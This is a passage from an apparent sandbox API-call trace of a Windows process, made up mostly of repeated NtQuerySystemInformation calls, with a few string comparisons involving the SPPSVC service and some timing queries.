_String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0206.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1a8, Length=0x50, ResultLength=0x0) [0206.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0d0, Length=0x38, ResultLength=0x0) [0206.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf00, Length=0x28, ResultLength=0x0) [0206.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf00, Length=0x28, ResultLength=0x0) [0206.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf00, Length=0x28, ResultLength=0x0) [0206.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf70, Length=0x28, ResultLength=0x0) [0206.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0d0, Length=0x38, ResultLength=0x0) [0206.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcff0, Length=0x28, ResultLength=0x0) [0206.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcff0, Length=0x28, ResultLength=0x0) [0206.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0d0, Length=0x38, ResultLength=0x0) [0206.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf50, Length=0x20, ResultLength=0x0) [0206.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfced0, Length=0x20, ResultLength=0x0) [0206.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfced0, Length=0x20, ResultLength=0x0) [0206.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfced0, Length=0x20, ResultLength=0x0) [0206.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0d0, Length=0x38, ResultLength=0x0) [0206.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf50, Length=0x20, ResultLength=0x0) [0206.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcee0, Length=0x20, ResultLength=0x0) [0206.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcee0, Length=0x20, ResultLength=0x0) [0206.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4b8, Length=0x50, ResultLength=0x0) [0206.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd430, Length=0x28, ResultLength=0x0) [0206.716] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0206.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4b8, Length=0x50, ResultLength=0x0) [0206.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4b8, Length=0x50, ResultLength=0x0) [0206.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3a0, Length=0x50, ResultLength=0x0) [0206.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd320, Length=0x28, ResultLength=0x0) [0206.716] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0206.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3a0, Length=0x50, ResultLength=0x0) [0206.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3a0, Length=0x50, ResultLength=0x0) [0206.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3a0, Length=0x50, ResultLength=0x0) [0206.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x38, ResultLength=0x0) [0206.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x28, ResultLength=0x0) [0206.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x28, ResultLength=0x0) [0206.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x28, ResultLength=0x0) [0206.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd170, Length=0x28, ResultLength=0x0) [0206.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x38, ResultLength=0x0) [0206.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1f0, Length=0x28, ResultLength=0x0) [0206.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1f0, Length=0x28, ResultLength=0x0) [0206.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x38, ResultLength=0x0) [0206.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd150, Length=0x20, ResultLength=0x0) [0206.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0d0, Length=0x20, ResultLength=0x0) [0206.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0d0, Length=0x20, ResultLength=0x0) [0206.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0d0, Length=0x20, ResultLength=0x0) [0206.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x38, ResultLength=0x0) [0206.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd150, Length=0x20, ResultLength=0x0) [0206.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0e0, Length=0x20, ResultLength=0x0) [0206.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0e0, Length=0x20, ResultLength=0x0) [0206.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.733] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc751dfd400 | out: lpSystemTimeAsFileTime=0xc751dfd400*(dwLowDateTime=0xdc7e9242, dwHighDateTime=0x1d5fb6e)) [0206.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4b8, Length=0x50, ResultLength=0x0) [0206.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3f0, Length=0x28, ResultLength=0x0) [0206.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd308, Length=0x50, ResultLength=0x0) [0206.733] GetTickCount () returned 0x11745f5 [0206.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1d8, Length=0x58, ResultLength=0x0) [0206.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0f0, Length=0x38, ResultLength=0x0) [0206.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf20, Length=0x28, ResultLength=0x0) [0206.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf20, Length=0x28, ResultLength=0x0) [0206.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf20, Length=0x28, ResultLength=0x0) [0206.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf20, Length=0x28, ResultLength=0x0) [0206.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf90, Length=0x28, ResultLength=0x0) [0206.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0f0, Length=0x38, ResultLength=0x0) [0206.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd010, Length=0x28, ResultLength=0x0) [0206.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd010, Length=0x28, ResultLength=0x0) [0206.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0f0, Length=0x38, ResultLength=0x0) [0206.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf70, Length=0x20, ResultLength=0x0) [0206.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcef0, Length=0x20, ResultLength=0x0) [0206.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcef0, Length=0x20, ResultLength=0x0) [0206.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcef0, Length=0x20, ResultLength=0x0) [0206.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0f0, Length=0x38, ResultLength=0x0) [0206.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf70, Length=0x20, ResultLength=0x0) [0206.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf00, Length=0x20, ResultLength=0x0) [0206.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf00, Length=0x20, ResultLength=0x0) [0206.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1d8, Length=0x58, ResultLength=0x0) [0206.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x38, ResultLength=0x0) [0206.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcef0, Length=0x28, ResultLength=0x0) [0206.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcef0, Length=0x28, ResultLength=0x0) [0206.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcef0, Length=0x28, ResultLength=0x0) [0206.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcef0, Length=0x28, ResultLength=0x0) [0206.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf60, Length=0x28, ResultLength=0x0) [0206.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x38, ResultLength=0x0) [0206.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x38, ResultLength=0x0) [0206.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfe0, Length=0x28, ResultLength=0x0) [0206.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfe0, Length=0x28, ResultLength=0x0) [0206.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x38, ResultLength=0x0) [0206.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x38, ResultLength=0x0) [0206.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce50, Length=0x20, ResultLength=0x0) [0206.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdd0, Length=0x20, ResultLength=0x0) [0206.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdd0, Length=0x20, ResultLength=0x0) [0206.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdd0, Length=0x20, ResultLength=0x0) [0206.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd020, Length=0x20, ResultLength=0x0) [0206.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x38, ResultLength=0x0) 